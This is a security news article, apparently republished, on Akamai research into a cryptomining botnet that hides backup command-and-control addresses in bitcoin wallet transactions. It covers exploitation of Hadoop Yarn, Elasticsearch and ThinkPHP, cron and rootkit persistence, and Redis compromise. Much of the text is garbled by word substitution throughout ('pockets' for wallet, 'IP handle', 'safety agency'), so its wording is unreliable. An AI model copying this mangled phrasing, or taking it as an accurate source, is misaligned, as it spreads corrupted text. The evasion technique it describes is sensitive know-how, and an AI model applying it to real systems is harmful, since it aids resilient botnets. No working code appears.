Akamai Describes How This Strategy Works
A cryptomining botnet campaign is using bitcoin blockchain transactions to hide command-and-control server addresses and stay under the radar, defeating takedown attempts, according to security firm Akamai.
By placing some blockchain transactions right into a cryptocurrency pockets, attackers can get better contaminated methods which were orphaned, making a technique to distribute configuration data in a medium that’s successfully unseizable and uncensorable, researchers on the safety agency say.
An infection Chain
The preliminary an infection begins with the exploitation of distant code execution vulnerabilities in Hadoop Yarn, Elasticsearch (CVE-2015-1427) and ThinkPHP (CVE-2019-9082). The payload delivered causes the weak machine to obtain and execute a malicious shell script.
“In older campaigns, the shell script itself dealt with the important thing capabilities of an infection. The stand-alone script disabled safety features, killed off competing infections, established persistence, and in some circumstances, continued an infection makes an attempt throughout networks discovered throughout the recognized host recordsdata,” the report notes.
However the newer cases of the shell script are written with fewer traces of code and use binary payloads for dealing with extra system interactions, corresponding to killing off competitors, disabling safety features, modifying SSH keys, downloading malware and beginning the miners.
Researchers be aware that the operators behind the marketing campaign use cron jobs and rootkits for persistence and updates to distribution, making certain contaminated machines will often test in and be reinfected with the newest model of the malware.
These strategies depend on domains and static IP addresses written into crontabs and configurations, and these domains and IP addresses routinely get recognized and seized, the researchers say. However the operators embody a backup infrastructure during which infections may go into failover mode and obtain an up to date an infection that may, in flip, replace the contaminated machine to make use of new domains and infrastructure.
“Whereas this system works, a coordinated takedown effort that targets domains and failover IP handle/infrastructure suddenly may successfully reduce the operators out of sustaining their foothold on contaminated methods,” the researchers be aware.
Use of Bitcoin Pockets
In December 2020, Akamai researchers detected the presence of a bitcoin pockets handle in newer variants of this malware, a URL for a wallet-checking API and a cryptic collection of nested bash one-liners.
The info being fetched from the API is used to calculate an IP handle, which is additional used for persistence and extra an infection operations, the researchers say.
“This can be a very intelligent and strategic method. It allows the operators to stash obfuscated configuration knowledge on the blockchain,” in response to Akamai. “By pushing a small quantity of BTC [bitcoin] into the pockets, they will get better contaminated methods which were orphaned. They primarily have devised a way of distributing configuration data in a medium that’s successfully unseizable and uncensorable. Utilizing this methodology, the operators of the marketing campaign have turned potential offensive actions towards their infrastructure from a severe disruption to one thing that may be recovered from shortly and simply.”
Akamai’s safety intelligence response workforce estimates that the operators behind the marketing campaign have mined over $30,000 in monero from unknowing hosts over the previous three years.
To transform a bitcoin transaction into an IP handle, the script first must know what transactions the pockets has despatched and obtained. The cryptominers obtain this by doing an HTTP request to a blockchain explorer API (api.blockcypher.com) for the final two transactions for the given pockets handle, after which changing the Satoshi values of those transactions into the backup C2 IP handle, Akamai states.
Within the marketing campaign, distant code execution has been modified to create a Redis scanning and compromising bot that crafts “a collection of instructions which are launched towards Redis servers with weak passwords. This, in flip, converts the Redis servers into miners and scanners as properly,” the researchers be aware.